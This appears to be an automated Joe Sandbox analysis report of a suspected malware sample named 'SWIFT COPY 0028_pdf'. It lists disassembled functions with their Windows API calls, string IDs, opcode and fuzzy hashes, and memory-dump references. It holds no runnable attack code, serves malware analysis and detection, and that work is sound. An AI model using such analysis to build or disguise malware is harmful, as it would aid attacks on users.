                                                                                    • Opcode ID: 64808d82fc0a932c849b87b8297a1a9d870b638ba4a8f5fb90417276a16e08d4
                                                                                    • Instruction ID: 0ec381307c6048d4469581e3b281d5310f5a996f0c63fdaae8f051f2b429753b
                                                                                    • Opcode Fuzzy Hash: 64808d82fc0a932c849b87b8297a1a9d870b638ba4a8f5fb90417276a16e08d4
                                                                                    • Instruction Fuzzy Hash: BB51A432644700AFD710EF24DC49B2B77E8EF85751F048969F96AD72A1DB34E901DB41
                                                                                    Function 00989E43 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00989E5B
                                                                                    • CreateMenu.USER32 ref: 00989E76
                                                                                    • SetMenu.USER32(?,00000000), ref: 00989E85
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00989F12
                                                                                    • IsMenu.USER32(?), ref: 00989F28
                                                                                    • CreatePopupMenu.USER32 ref: 00989F32
                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00989F63
                                                                                    • DrawMenuBar.USER32 ref: 00989F71
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 176399719-4108050209
                                                                                    • Opcode ID: 08c30e983b8b4d82d93bff5360a13f3753fd57d4e2a46daf297e1cc6e4c862a0
                                                                                    • Instruction ID: 78883d823d9c69d0d9b8e3f6b555a0270a81ac1efaf6d3ab8050be932e25375c
                                                                                    • Opcode Fuzzy Hash: 08c30e983b8b4d82d93bff5360a13f3753fd57d4e2a46daf297e1cc6e4c862a0
                                                                                    • Instruction Fuzzy Hash: 09416A74A11205AFDB14EF64D984BEABBB9FF49314F184019FA46A7351D730AD10DF90
                                                                                    Function 0096E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0096E396
                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0096E40C
                                                                                    • GetLastError.KERNEL32 ref: 0096E416
                                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 0096E483
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                    • API String ID: 4194297153-14809454
                                                                                    • Opcode ID: 7ab87a8493f470749dd0ec30aef93bb78f2962d3bd24abe610a111f1189cd5f5
                                                                                    • Instruction ID: 731d5e63e064a63134f83d87de46667b7d8d3415d74a4522e38e9ee129173299
                                                                                    • Opcode Fuzzy Hash: 7ab87a8493f470749dd0ec30aef93bb78f2962d3bd24abe610a111f1189cd5f5
                                                                                    • Instruction Fuzzy Hash: 35318439A44209AFDB01EF74D945BBDB7B8EF85304F14C426E906EB2A1DF70AA01D791
                                                                                    Function 0095B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0095B98C
                                                                                    • GetDlgCtrlID.USER32 ref: 0095B997
                                                                                    • GetParent.USER32 ref: 0095B9B3
                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0095B9B6
                                                                                    • GetDlgCtrlID.USER32(?), ref: 0095B9BF
                                                                                    • GetParent.USER32(?), ref: 0095B9DB
                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0095B9DE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CtrlParent
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 1383977212-1403004172
                                                                                    • Opcode ID: bf7b7c013dfb8c426c0e8c2a9181822cfca4368a6207c70e076fcd66b825713d
                                                                                    • Instruction ID: 1b76bf881d132936290a606348e7c2bb7ef77b67c44ac933b7857f45ebae67e8
                                                                                    • Opcode Fuzzy Hash: bf7b7c013dfb8c426c0e8c2a9181822cfca4368a6207c70e076fcd66b825713d
                                                                                    • Instruction Fuzzy Hash: BD21F5B4900104BFDB04EBA1DC96EFEBB78EF9A304F10411AFA52932E1DB745819DB60
                                                                                    Function 0095B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0095BA73
                                                                                    • GetDlgCtrlID.USER32 ref: 0095BA7E
                                                                                    • GetParent.USER32 ref: 0095BA9A
                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0095BA9D
                                                                                    • GetDlgCtrlID.USER32(?), ref: 0095BAA6
                                                                                    • GetParent.USER32(?), ref: 0095BAC2
                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0095BAC5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CtrlParent
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 1383977212-1403004172
                                                                                    • Opcode ID: c1c329ca46e4a1948a034137ad8c0801e5ea1150d21efe2b62dcb0fbcb121786
                                                                                    • Instruction ID: f0fd14313890477de2751e0c28306420e766cf14aa4072b7668b433ca4f7483b
                                                                                    • Opcode Fuzzy Hash: c1c329ca46e4a1948a034137ad8c0801e5ea1150d21efe2b62dcb0fbcb121786
                                                                                    • Instruction Fuzzy Hash: FE21C1B4940104BFDB04EB60CC85FFEB7B8EF85300F104016F95293195DB754819EB60
                                                                                    Function 0095BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetParent.USER32 ref: 0095BAE3
                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 0095BAF8
                                                                                    • _wcscmp.LIBCMT ref: 0095BB0A
                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0095BB85
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                    • API String ID: 1704125052-3381328864
                                                                                    • Opcode ID: 6451e6cc91bb9ccf4649b1dbc80c23e76727a29efbad703c267c7170ffeb8947
                                                                                    • Instruction ID: 5d995a51ef4895e4da8aebdffe2406d785a7194286b30bbe397b1a7b9205496b
                                                                                    • Opcode Fuzzy Hash: 6451e6cc91bb9ccf4649b1dbc80c23e76727a29efbad703c267c7170ffeb8947
                                                                                    • Instruction Fuzzy Hash: CB11297664C703F9FA24AB35EC07DA6379CDFA1324B200122FE09E40D5FBE5A8555654
                                                                                    Function 0097B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(?), ref: 0097B2D5
                                                                                    • CoInitialize.OLE32(00000000), ref: 0097B302
                                                                                    • CoUninitialize.OLE32 ref: 0097B30C
                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 0097B40C
                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 0097B539
                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0097B56D
                                                                                    • CoGetObject.OLE32(?,00000000,009AD91C,?), ref: 0097B590
                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 0097B5A3
                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0097B623
                                                                                    • VariantClear.OLEAUT32(009AD91C), ref: 0097B633
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                    • String ID:
                                                                                    • API String ID: 2395222682-0
                                                                                    • Opcode ID: fc223910d5f0ff5bca6fc18465838301709b28d08d678a07bfcd37161d178640
                                                                                    • Instruction ID: ebe5e4b4ede3244dd2ca93f6351f7f33b5ae5ac390d91a245a858d8438eed659
                                                                                    • Opcode Fuzzy Hash: fc223910d5f0ff5bca6fc18465838301709b28d08d678a07bfcd37161d178640
                                                                                    • Instruction Fuzzy Hash: 4CC104B2608305AFC700DF68C884A6BB7E9BF89704F04895DF58ADB251DB71ED45CB92
                                                                                    Function 0094ACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __lock.LIBCMT ref: 0094ACC1
                                                                                      • Part of subcall function 00947CF4: __mtinitlocknum.LIBCMT ref: 00947D06
                                                                                      • Part of subcall function 00947CF4: EnterCriticalSection.KERNEL32(00000000,?,00947ADD,0000000D), ref: 00947D1F
                                                                                    • __calloc_crt.LIBCMT ref: 0094ACD2
                                                                                      • Part of subcall function 00946986: __calloc_impl.LIBCMT ref: 00946995
                                                                                      • Part of subcall function 00946986: Sleep.KERNEL32(00000000,000003BC,0093F507,?,0000000E), ref: 009469AC
                                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 0094ACED
                                                                                    • GetStartupInfoW.KERNEL32(?,009D6E28,00000064,00945E91,009D6C70,00000014), ref: 0094AD46
                                                                                    • __calloc_crt.LIBCMT ref: 0094AD91
                                                                                    • GetFileType.KERNEL32(00000001), ref: 0094ADD8
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0094AE11
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                    • String ID:
                                                                                    • API String ID: 1426640281-0
                                                                                    • Opcode ID: a4fc31a43be1946c882dece03ef4e1b96c2f02b100a7dbe38023ff765cbee02d
                                                                                    • Instruction ID: b51567f794d601cd40b39e77d7ae0ea8cd849c21d6a6f3435de0ce53a1550cd2
                                                                                    • Opcode Fuzzy Hash: a4fc31a43be1946c882dece03ef4e1b96c2f02b100a7dbe38023ff765cbee02d
                                                                                    • Instruction Fuzzy Hash: F281F5719453458FDB14CF68C8809AEBBF4AF4A324B24466DD4B6AB3D2C7349C03DB56
                                                                                    Function 009667E9 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __swprintf.LIBCMT ref: 009667FD
                                                                                    • __swprintf.LIBCMT ref: 0096680A
                                                                                      • Part of subcall function 0094172B: __woutput_l.LIBCMT ref: 00941784
                                                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 00966834
                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 00966840
                                                                                    • LockResource.KERNEL32(00000000), ref: 0096684D
                                                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 0096686D
                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 0096687F
                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0096688E
                                                                                    • LockResource.KERNEL32(?), ref: 0096689A
                                                                                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 009668F9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                    • String ID:
                                                                                    • API String ID: 1433390588-0
                                                                                    • Opcode ID: cd2790d29ef3e2c5ea387fa476453a61ee1306d5d6779af76eeca5e435c2c2ee
                                                                                    • Instruction ID: c9adeda7771e60394313d3e36f5ecb493ff0a564ac0e5e514f96845f01708ba6
                                                                                    • Opcode Fuzzy Hash: cd2790d29ef3e2c5ea387fa476453a61ee1306d5d6779af76eeca5e435c2c2ee
                                                                                    • Instruction Fuzzy Hash: 42318D7190525AABDB109F70DD85EBE7BACFF49341B008425F912E7150E734DD51EBA0
                                                                                    Function 0099DD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetSysColor.USER32(00000008), ref: 0093B496
                                                                                    • SetTextColor.GDI32(?,000000FF), ref: 0093B4A0
                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0093B4B5
                                                                                    • GetStockObject.GDI32(00000005), ref: 0093B4BD
                                                                                    • GetClientRect.USER32(?), ref: 0099DD63
                                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 0099DD7A
                                                                                    • GetWindowDC.USER32(?), ref: 0099DD86
                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0099DD95
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0099DDA7
                                                                                    • GetSysColor.USER32(00000005), ref: 0099DDC5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3430376129-0
                                                                                    • Opcode ID: 0df8cc1186eb892fea814f197786c54044367e0dafe6d9ddaba166bf48105047
                                                                                    • Instruction ID: 910ef90fc5a40ef54ed7badcfd868d922c495946a37673431b668942f95afda8
                                                                                    • Opcode Fuzzy Hash: 0df8cc1186eb892fea814f197786c54044367e0dafe6d9ddaba166bf48105047
                                                                                    • Instruction Fuzzy Hash: E0115B31519205EFDB216FB4EC48BE97B65EF06325F108625FA67954F2CB320941EF60
                                                                                    Function 0095CB82 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnumChildWindows.USER32(?,0095CF50), ref: 0095CE90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ChildEnumWindows
                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                    • API String ID: 3555792229-1603158881
                                                                                    • Opcode ID: cd8f8319c91eec6417d657f240c30a6ae548a9d70368939ff9555c4dae505361
                                                                                    • Instruction ID: 68b83215f806a344897d1c68824921cdb70eaae3497567713776a62ca7f21814
                                                                                    • Opcode Fuzzy Hash: cd8f8319c91eec6417d657f240c30a6ae548a9d70368939ff9555c4dae505361
                                                                                    • Instruction Fuzzy Hash: 089170B0600706AECB18DFA1C482BEEFBB5BF45301F50851AD859A7291DF74A95ECBD0
                                                                                    Function 00923093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 009230DC
                                                                                    • CoUninitialize.OLE32(?,00000000), ref: 00923181
                                                                                    • UnregisterHotKey.USER32(?), ref: 009232A9
                                                                                    • DestroyWindow.USER32(?), ref: 00995079
                                                                                    • FreeLibrary.KERNEL32(?), ref: 009950F8
                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00995125
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                    • String ID: close all
                                                                                    • API String ID: 469580280-3243417748
                                                                                    • Opcode ID: 33037f1361b4234b64565bfdc113cf0b3c62a8f2ff4d696c687bc9063fde07b5
                                                                                    • Instruction ID: 95e802591ac5e04f1a3ebf0365afdb57a87d49f3689e56559495bcf85a4dda07
                                                                                    • Opcode Fuzzy Hash: 33037f1361b4234b64565bfdc113cf0b3c62a8f2ff4d696c687bc9063fde07b5
                                                                                    • Instruction Fuzzy Hash: 3B915C70611222CFCB15EF24E895B69F3B8FF45304F5581A9E40A67266CB34AE56CF50
                                                                                    Function 0093CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 0093CC15
                                                                                      • Part of subcall function 0093CCCD: GetClientRect.USER32(?,?), ref: 0093CCF6
                                                                                      • Part of subcall function 0093CCCD: GetWindowRect.USER32(?,?), ref: 0093CD37
                                                                                      • Part of subcall function 0093CCCD: ScreenToClient.USER32(?,?), ref: 0093CD5F
                                                                                    • GetDC.USER32 ref: 0099D137
                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0099D14A
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0099D158
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0099D16D
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0099D175
                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0099D200
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                    • String ID: U
                                                                                    • API String ID: 4009187628-3372436214
                                                                                    • Opcode ID: 2ccb654a7b75a2b309fade33afcf5a83308644b1dbd1ecfa052dfcf5b0729ac8
                                                                                    • Instruction ID: 99168315f90c641b84070a7cf02d3aa8b241a968c95264a9c65b102c2f40f18d
                                                                                    • Opcode Fuzzy Hash: 2ccb654a7b75a2b309fade33afcf5a83308644b1dbd1ecfa052dfcf5b0729ac8
                                                                                    • Instruction Fuzzy Hash: 4B712F71405204DFCF259F68CCC1AEA7BB9FF48310F184669ED566A2A6C7308C41DF60
                                                                                    Function 0098ECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0093B34E: GetWindowLongW.USER32(?,000000EB), ref: 0093B35F
                                                                                      • Part of subcall function 0093B63C: GetCursorPos.USER32(000000FF), ref: 0093B64F
                                                                                      • Part of subcall function 0093B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0093B66C
                                                                                      • Part of subcall function 0093B63C: GetAsyncKeyState.USER32(00000001), ref: 0093B691
                                                                                      • Part of subcall function 0093B63C: GetAsyncKeyState.USER32(00000002), ref: 0093B69F
                                                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0098ED3C
                                                                                    • ImageList_EndDrag.COMCTL32 ref: 0098ED42
                                                                                    • ReleaseCapture.USER32 ref: 0098ED48
                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 0098EDF0
                                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0098EE03
                                                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0098EEDC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
